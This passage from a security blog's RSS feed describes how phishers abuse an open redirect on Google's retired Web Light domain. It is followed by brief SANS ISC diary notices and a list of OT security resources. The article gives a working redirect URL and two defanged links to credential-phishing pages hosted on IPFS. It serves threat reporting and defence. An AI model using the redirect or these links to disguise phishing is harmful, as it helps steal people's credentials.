&lt;p&gt;While some aspects of the defensive mechanisms that are in place could potentially be &lt;a id=&#34;vulnerability&#34; href=&#34;https://untrustednetwork.net/en/2019/07/22/half-open-redirect-vulnerability-in-youtube/&#34;&gt;improved upon&lt;/a&gt;, they generally provide adequate protection from the most common exploitation approaches and techniques. Problem is that not all Google services and domains are secured in this way.&lt;/p&gt;
&lt;p&gt;One service, which does not have any similar protection mechanisms in place, is/was named &lt;a href=&#34;https://en.wikipedia.org/wiki/Google_Web_Light&#34;&gt;Google Web Light&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;It was first introduced in 2015 and provided a way to load web pages faster in Chrome on Android devices. In simple terms, Web Light served as a specialized proxy server, which “optimized” the transmitted content through compression and filtering in such a way, that &lt;a href=&#34;https://web.archive.org/web/20221215075806/https://developers.google.com/search/docs/crawling-indexing/mobile/web-light&#34;&gt;according to Google&lt;/a&gt;, in their experiments, optimized pages loaded four times faster than the original pages and used 80% fewer bytes. For mobile devices of the time, which were connected to the internet through low-bandwidth links (i.e., over 2G), this undoubtedly made significant difference.&lt;/p&gt;
&lt;p&gt;Google offered the service for several years (though only in selected countries) before &lt;a href=&#34;https://developers.google.com/search/updates#december-2022&#34;&gt;officially retiring the Web Light crawler&lt;/a&gt; in December 2022, when it was decided that the service was no longer needed given the increase in general availability of fast mobile internet and more computationally powerful mobile devices.&lt;/p&gt;
&lt;p&gt;However, the fact that the Web Light service as a whole was retired didn’t mean that all of its functions suddenly stopped working. In fact, to this day, the &lt;a href=&#34;https://web.archive.org/web/20221215075806/https:/developers.google.com/search/docs/crawling-indexing/mobile/web-light#see-the-web-light-version-of-a-web-page&#34;&gt;Web Light preview functionality&lt;/a&gt; is partially available… though it does not function in precisely the same way as it used to.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2024/03-google-phishing/google-weblight-preview.png&#34; alt=&#34;Google Web Light preview functionality&#34; style=&#34;max-width:800px;width:100%;border:1px solid grey&#34;&gt;
&lt;div align=right&gt;&lt;kbd&gt;Source: Google&lt;/kbd&gt;&lt;/div&gt;
&lt;br&gt;
&lt;p&gt;If one tries to use the preview functionality these days, it does not provide a preview of a web page through the Web Light crawler as it used to – it can’t since the crawler is no longer being used – but rather simply redirects the visitor to the provided target URL using HTTP 301 response… You can probably see where this is going.&lt;/p&gt;
&lt;p&gt;Indeed, the redirection mechanism used on &lt;a href=&#34;https://googleweblight.com/&#34;&gt;https://googleweblight.com/&lt;/a&gt; appears to be completely open and unrestricted, and – unlike YouTube and Google search – does not display any warning that the browser is about to be redirected. You may try this yourself by opening the following link.&lt;/p&gt;
&lt;p&gt;&lt;kbd&gt;&lt;a href=&#34;https://googleweblight.com/i?u=untrustednetwork.net&#34;&gt;https://googleweblight.com/i?u=untrustednetwork.net&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;How big of a problem is this? Well, it depends on how trustworthy you consider the domain googleweblight.com to be… It certainly isn’t as bad as if the open redirect existed on google.com (though, by the way, there is at least &lt;a href=&#34;https://www.google.com/amp/s/untrustednetwork.net/&#34;&gt;one&lt;/a&gt; on that domain as well). Nevertheless, the fact that the domain name begins with “www.google&amp;hellip;”, and that the domain is actually &lt;a href=&#34;https://who.is/whois/googleweblight.com&#34;&gt;registered by Google&lt;/a&gt; lends it at least some level of credibility, both when it comes to people seeing a link to it, as well as when such a link is evaluated by automated security solutions.&lt;/p&gt;
&lt;p&gt;Threat actors obviously think that is looks trustworthy too, since I have seen the open redirect on googleweblight.com used in two different phishing campaigns just last week…&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2024/03-google-phishing/phish1.png&#34; alt=&#34;Phishing message with link pointing to googleweblight.com&#34; style=&#34;max-width:800px;width:100%;border:1px solid grey&#34;&gt;
&lt;br&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2024/03-google-phishing/phish2.png&#34; alt=&#34;Phishing message with link pointing to googleweblight.com&#34; style=&#34;max-width:800px;width:100%;border:1px solid grey&#34;&gt;
&lt;br&gt;
&lt;p&gt;As you may see, the links in the two phishing messages pointed to the following URLs:&lt;/p&gt;
&lt;p&gt;&lt;kbd&gt;hxxp[:]//googleweblight[.]com/i?u=hxxps[:]//bafybeicrejl4lniju4uumll6zph6fbntlgnarnd22kyijwfqmcltj2icba.ipfs.cf-ipfs[.]com/webmail.html#[e-mail address]&lt;/p&gt;
&lt;p&gt;&lt;kbd&gt;hxxps[:]//googleweblight[.]com/i?u=hxxps[:]//cloudflare-ipfs[.]com/ipfs/bafybeifrl56eni6oixqpdknl6n2fcatl23jvefr4knsrbaut7opquzcyry/#[e-mail address]&lt;/p&gt;
&lt;p&gt;Both of these links still work at the time of writing and lead to generic credential-stealing phishing pages. Note that both of them are hosted on &lt;a href=&#34;https://en.wikipedia.org/wiki/InterPlanetary_File_System&#34;&gt;IPFS&lt;/a&gt;, even if they are accessed through different gateways…&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2024/03-google-phishing/phishing-page1.png&#34; alt=&#34;Phishing page hosted on IPFS&#34; style=&#34;max-width:800px;width:100%;border:1px solid grey&#34;&gt;
&lt;br&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2024/03-google-phishing/phishing-page2.png&#34; alt=&#34;Phishing page hosted on IPFS&#34; style=&#34;max-width:800px;width:100%;border:1px solid grey&#34;&gt;
&lt;br&gt;
&lt;p&gt;This is far from the first time that the Google Web Light open redirect mechanism was used in a phishing campaign – analysts from Trustwave &lt;a href=&#34;https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/ipfs-the-new-hotbed-of-phishing/&#34;&gt;mentioned seeing it used in 2022&lt;/a&gt;, and I myself came across it in a phishing campaign in 2023. Nevertheless, the fact that even with the limited visibility I have, I came across two messages from different campaigns that exploit this vulnerability in a single week would seem to indicate that the use of this redirection mechanism by phishing authors might be becoming more of a mainstream technique, and thus might warrant some response.&lt;/p&gt;
&lt;p&gt;I have therefore reported the fact that the open redirect on the Web Light domain exists and is under active exploitation to Google, along with a recommendation for implementing the same defenses there, as they have on their other services. They responded that the open redirect is intended behavior, and that their “position on open redirectors is described in greater detail in &lt;a href=&#34;https://bughunters.google.com/learn/invalid-reports/web-platform/navigation/6680364896223232/open-redirectors&#34;&gt;this article&lt;/a&gt;”. Since it therefore appears that Google’s “Web Light Open Redirection Service”, as I shall call it from now on, will stay with us for at least the foreseeable future, it might be worth thinking about what we may do about it ourselves.&lt;/p&gt;
&lt;p&gt;Since the googleweblight.com domain is connected with a retired service and will therefore hardly be used for anything business-relevant in the near future, the most straightforward approach would seem to be to filter out/quarantine any e-mails with links that point to it and/or to completely block access to it. Although the domain will probably never make it to any commercial or publicly available blocklist, since it is registered by Google, and no content hosted on it is actually malicious, nothing is stopping us from manually adding it to any internal blocklists we may be using within our own organizations…&lt;/p&gt;
&lt;p&gt;While we’re on the subject, it might be worthwhile to do the same thing with &lt;a href=&#34;https://github.com/ipfs/public-gateway-checker/blob/main/gateways.json&#34;&gt;all public IPFS gateways&lt;/a&gt; as well. Since IPFS currently has very low (if any) business relevance for most organization, and threat actors use it &lt;a href=&#34;https://www.trendmicro.com/en_vn/research/22/l/web3-ipfs-only-used-for-phishing---so-far.html&#34;&gt;quite heavily&lt;/a&gt; to host phishing pages, this simple step might help us significantly reduce risk connected with untargeted phishing… But we’ll discuss that in more detail another time.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.net/images/2024/03-google-phishing/title.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>Vulnerability</category>
            
          
            
              <category>Google</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>IPFS</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>Vulnerabilities</category>
            
          
            
              <category>2024</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Phishing pages hosted on archive.org</title>
        <link>https://untrustednetwork.net/en/2024/02/21/internet-archive-phishing/</link>
        <pubDate>Wed, 21 Feb 2024 08:30:00 +0100</pubDate>
        
        <atom:modified>Wed, 21 Feb 2024 08:30:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2024/02/21/internet-archive-phishing/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at hosting of phishing pages on archive.org&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/30676&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at hosting of phishing pages on archive.org&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Internet Archive</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2024</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Computer viruses are celebrating their 40th birthday (well, 54th, really)</title>
        <link>https://untrustednetwork.net/en/2024/02/06/virus-anniversary/</link>
        <pubDate>Tue, 06 Feb 2024 10:00:00 +0100</pubDate>
        
        <atom:modified>Tue, 06 Feb 2024 10:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2024/02/06/virus-anniversary/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at an interesting anniversary related to computer viruses&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/30624&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at an interesting anniversary related to computer viruses&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Virus</category>
            
          
            
              <category>Malware</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2024</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Interesting large and small malspam attachments from 2023</title>
        <link>https://untrustednetwork.net/en/2024/01/03/2023-malspam/</link>
        <pubDate>Wed, 03 Jan 2024 15:00:00 +0100</pubDate>
        
        <atom:modified>Wed, 03 Jan 2024 15:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2024/01/03/2023-malspam/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at the largest and smallest malware samples, that my malspam traps caught last year&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/30524&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at the largest and smallest malware samples, that my malspam traps caught last year&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>Malspam</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2024</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>OT Security Links</title>
        <link>https://untrustednetwork.net/en/otsec/</link>
        <pubDate>Mon, 01 Jan 2024 10:00:00 +0100</pubDate>
        
        <atom:modified>Mon, 01 Jan 2024 10:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/otsec/</guid>
        <description>W32.Stuxnet Dossier CRASHOVERRIDE - Analysis of the Threat to Electric Grid Operations TRISIS Malware - Analysis of Safety System Targeted Malware Strategic Overview of the Fuxnet Malware THE STATE OF OT SECURITY: A COMPREHENSIVE GUIDE TO TRENDS, RISKS, &amp;amp; CYBER RESILIENCE CISA - DEFENDING OT OPERATIONS AGAINST ONGOING PRO-RUSSIA HACKTIVIST ACTIVITY IEC 61131-3 TCP-Enabled Data Diode MODBUS/TCP Security IEC 62351 BACnet Secure Connect Cyber-Informed Engineering Implementation Guide SANS - The Five ICS Cybersecurity Critical Controls OT Security Dozen: Series on Building an OT/ICS Cybersecurity Program New network code on cybersecurity for EU electricity sector NIST IR 8183A Vol.</description>
        <content:encoded>&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf&#34;&gt;W32.Stuxnet Dossier&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.dragos.com/wp-content/uploads/CrashOverride-01.pdf&#34;&gt;CRASHOVERRIDE - Analysis of the Threat to Electric Grid Operations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.dragos.com/wp-content/uploads/TRISIS-01.pdf&#34;&gt;TRISIS Malware - Analysis of Safety System Targeted Malware&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://hub.dragos.com/hubfs/Reports/Dragos_SB_Intel_Fuxnet_ICSMalware.pdf?hsLang=en&#34;&gt;Strategic Overview of the Fuxnet Malware&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/state-of-ot-security-report-2024.pdf&#34;&gt;THE STATE OF OT SECURITY: A COMPREHENSIVE GUIDE TO TRENDS, RISKS, &amp;amp; CYBER RESILIENCE&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://media.defense.gov/2024/May/01/2003454817/-1/-1/0/DEFENDING-OT-OPERATIONS-AGAINST-ONGOING-PRO-RUSSIA-HACKTIVIST-ACTIVITY.PDF&#34;&gt;CISA - DEFENDING OT OPERATIONS AGAINST ONGOING PRO-RUSSIA HACKTIVIST ACTIVITY&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://en.wikipedia.org/wiki/IEC_61131-3&#34;&gt;IEC 61131-3&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://owlcyberdefense.com/wp-content/uploads/2019/05/owlcyberdefense-brochure_owl-faqs.pdf&#34;&gt;TCP-Enabled Data Diode&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.modbus.org/file/secure/modbussecurityprotocol.pdf&#34;&gt;MODBUS/TCP Security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://en.wikipedia.org/wiki/IEC_62351&#34;&gt;IEC 62351&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://bacnetinternational.org/bacnetsc/&#34;&gt;BACnet Secure Connect&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://inldigitallibrary.inl.gov/sites/sti/sti/Sort_67122.pdf&#34;&gt;Cyber-Informed Engineering Implementation Guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://sansorg.egnyte.com/dl/R0r9qGEhEe&#34;&gt;SANS - The Five ICS Cybersecurity Critical Controls&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://gca.isa.org/blog/ot-security-dozen-series-on-building-an-ot/ics-cybersecurity-program&#34;&gt;OT Security Dozen: Series on Building an OT/ICS Cybersecurity Program&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://energy.ec.europa.eu/news/new-network-code-cybersecurity-eu-electricity-sector-2024-03-11_en&#34;&gt;New network code on cybersecurity for EU electricity sector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://csrc.nist.gov/pubs/ir/8183/a/v1/final&#34;&gt;NIST IR 8183A Vol. 1 - Cybersecurity Framework Manufacturing Profile Low Impact Level Example Implementations Guide: Volume 1 – General Implementation Guidance&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://syc-se.iec.ch/deliveries/cybersecurity-guidelines/security-standards-and-best-practices/iec-62443/&#34;&gt;IEC 62443&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.isa.org/news-press-releases/2021/november/the-international-electrotechnical-commission-desi&#34;&gt;The International Electrotechnical Commission Designates ISA/IEC 62443 as a Horizontal Standard&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.iec.ch/dyn/www/f?p=103:38:598041223447::::FSP_ORG_ID,FSP_APEX_PAGE,FSP_PROJECT_ID:1248,20,109433&#34;&gt;IEC TC 9 Electrical equipment and systems for railways&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cencenelec.eu/news-and-events/news/2021/eninthespotlight/2021-06-10-new-clc-ts-50701-railways-cybersecurity/&#34;&gt;A major step for railways cybersecurity: the new CLC/TS 50701&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.iso.org/standard/76097.html&#34;&gt;IEC 81001-5-1:2021 Health software and health IT systems safety, effectiveness and security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://industrialcyber.co/isa-iec-62443/isa99-committee-updates-community-on-activities-and-plans-for-isa-iec-62443-standards/&#34;&gt;ISA99 committee updates community on activities and plans for ISA/IEC-62443 standards&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://f.hubspotusercontent10.net/hubfs/5382318/Applying%20ISO%20IEC%2027001%202%20and%20the%20ISA%20IEC%2062443%20Series%20White%20Paper.pdf&#34;&gt;Applying ISO/IEC 27001/2 and the ISA/IEC 62443 Series for Operational Technology Environments&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://gca.isa.org/hubfs/ISAGCA%20Quick%20Start%20Guide%20FINAL.pdf&#34;&gt;Quick Start Guide: An Overview of ISA/IEC 62443 Standards Security of Industrial Automation and Control Systems&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://cms.uitp.org/wp/wp-content/uploads/2023/01/Report-Cybersecurity_final.pdf&#34;&gt;UITP - PRACTICAL GUIDANCE ON CYBERSECURITY REQUIREMENTS IN TENDERING&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://csrc.nist.gov/pubs/sp/800/82/r3/final&#34;&gt;NIST SP 800-82 Rev. 3 - Guide to Operational Technology (OT) Security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.nist.gov/cyberframework&#34;&gt;NIST Cybersecurity Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.mitre.org/sites/default/files/2023-01/PR-22-2824-Crown-Jewels-for-Industrial-Control-Systems.pdf&#34;&gt;Crown Jewels Analysis (CJA) for Industrial Control Systems (ICS)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://attack.mitre.org/&#34;&gt;MITRE ATT&amp;amp;CK&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://attack.mitre.org/matrices/ics/&#34;&gt;MITRE ATT&amp;amp;CK for ICS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://mitre-attack.github.io/attack-navigator/&#34;&gt;MITRE ATT&amp;amp;CK Navigator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://emb3d.mitre.org/&#34;&gt;MITRE EMB3D Threat Model&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://learn.microsoft.com/en-us/azure/security/develop/threat-modeling-tool&#34;&gt;Microsoft Threat Modeling Tool&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cisecurity.org/cis-benchmarks&#34;&gt;CIS Benchmarks List&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.plc-security.com/content/Top_20_Secure_PLC_Coding_Practices_V1.0.pdf&#34;&gt;Secure PLC Coding Practices: Top 20 List&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cisco.com/c/en/us/solutions/design-zone/industries/manufacturing/cpwe.html&#34;&gt;Validated Designs for Digital Manufacturing - Converged Plantwide Ethernet (CPwE)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.rockwellautomation.com/en-cz/capabilities/industrial-networks/design-guides.html&#34;&gt; Industrial Networks Design Guides Proven Architectures with Design and Implementation Guidance&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://sansorg.egnyte.com/dl/eQu4hT5fCW&#34;&gt;SANS ICS410 SCADA Reference Model&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.iiconsortium.org/iira/&#34;&gt;The Industrial Internet Reference Architecture&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.iiconsortium.org/iisf/&#34;&gt;Industrial Internet Security Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.ibm.com/topics/what-is-a-digital-twin&#34;&gt;What is a digital twin?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://azure.microsoft.com/cs-cz/products/digital-twins&#34;&gt;Azure Digital Twins&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.nist.gov/news-events/news/2023/02/how-digital-twins-could-protect-manufacturers-cyberattacks&#34;&gt;How Digital Twins Could Protect Manufacturers From Cyberattacks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://goldilock.com/product&#34;&gt;Goldilock&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.youtube.com/watch?v=-XEdb-B4dCo&#34;&gt;ICS/OT Secure Remote Access&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://learn.microsoft.com/cs-cz/sysinternals/downloads/sysmon&#34;&gt;Sysmon&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.forescout.com/solutions/medical-device-security/&#34;&gt;Forescout Comprehensive Medical Device Security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/telekom-security/tpotce&#34;&gt;T-Pot - The All In One Multi Honeypot Platform&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;http://conpot.org/&#34;&gt;CONPOT ICS/SCADA Honeypot&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/DidierStevens/Beta/blob/master/tcp-honeypot.py&#34;&gt;tcp-honeypot.py&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://arkime.com/&#34;&gt;Arkime&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://suricata.io/&#34;&gt;Suricata&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://zeek.org/&#34;&gt;Zeek&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/cisagov/ICSNPP&#34;&gt;Zeek Industrial Control Systems Network Protocol Parsers (ICSNPP)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/ITI/ICS-Security-Tools/tree/master/pcaps&#34;&gt;ICS PCAPs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.wireshark.org/&#34;&gt;Wireshark&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.netresec.com/?page=NetworkMiner&#34;&gt;NetworkMiner&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cisa.gov/sites/default/files/2023-01/final-RP_ics_cybersecurity_incident_response_100609.pdf&#34;&gt;Developing an Industrial Control Systems Cybersecurity Incident Response Capability&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://cloud.google.com/blog/topics/threat-intelligence/ontology-understand-assess-operational-technology-cyber-incidents/&#34;&gt;The FireEye OT-CSIO: An Ontology to Understand, Cross-Compare, and Assess Operational Technology Cyber Security Incidents&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.nozominetworks.com/solutions/iot-ot-vulnerability-management&#34;&gt;NOZOMI Risk &amp;amp; Vulnerability Management for OT &amp;amp; IoT Devices&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.tenable.com/products/ot-security&#34;&gt;Tenable OT Security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cisa.gov/news-events/cybersecurity-advisories&#34;&gt;CISA Cybersecurity Alerts &amp;amp; Advisories&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://isasecure.org/certification&#34;&gt;ISASecure Certifications&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.iiconsortium.org/pdf/SMM_Description_and_Intended_Use_V1.2.pdf&#34;&gt;IoT Security Maturity Model (SMM):Description and Intended Use&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.digitaltwinconsortium.org/wp-content/uploads/sites/3/2022/06/SMM-Digital-Twin-Profile-2022-06-20.pdf&#34;&gt;IoT Security Maturity Model Digital Twin Profile&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.isagca.org/hubfs/2023%20ISA%20Website%20Redesigns/ISAGCA/PDFs/SMM-62443-Asset-Owner-Product-Supplier-Service_20230809.pdf&#34;&gt;IoT Security Maturity Model: ISA/IEC 62443 Mappings for Asset Owners, Product Suppliers and System Integrators&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://smartgrid.epri.com/doc/NESCORGuidetoPenetrationTestingforElectricUtilities-v3-Final.pdf&#34;&gt;NESCOR Guide to Penetration Testing for Electric Utilities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.isecom.org/OSSTMM.3.pdf&#34;&gt;OSSTMM v3 – The Open Source Security Testing Methodology Manual&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/mitre/caldera&#34;&gt;MITRE Caldera&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/mitre/caldera-ot&#34;&gt;MITRE Caldera for OT Plugins&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.sans.org/cyber-security-summit/&#34;&gt;SANS Cyber Security Summits&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.sans.org/cyber-security-courses/?focus-area=industrial-control-systems-security&#34;&gt;SANS Cybersecurity Courses &amp;amp; Certifications&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.isa.org/certification/certificate-programs/isa-iec-62443-cybersecurity-certificate-program&#34;&gt;ISA/IEC 62443 Cybersecurity Certificate Program&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Whose packet is it anyway: a new RFC for attribution of internet probes</title>
        <link>https://untrustednetwork.net/en/2023/12/06/probe-attribution/</link>
        <pubDate>Wed, 06 Dec 2023 11:45:00 +0100</pubDate>
        
        <atom:modified>Wed, 06 Dec 2023 11:45:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2023/12/06/probe-attribution/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a recently published RFC which provides way for network scans performed over the internet to be attributed&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/30456&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a recently published RFC which provides way for network scans performed over the internet to be attributed&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
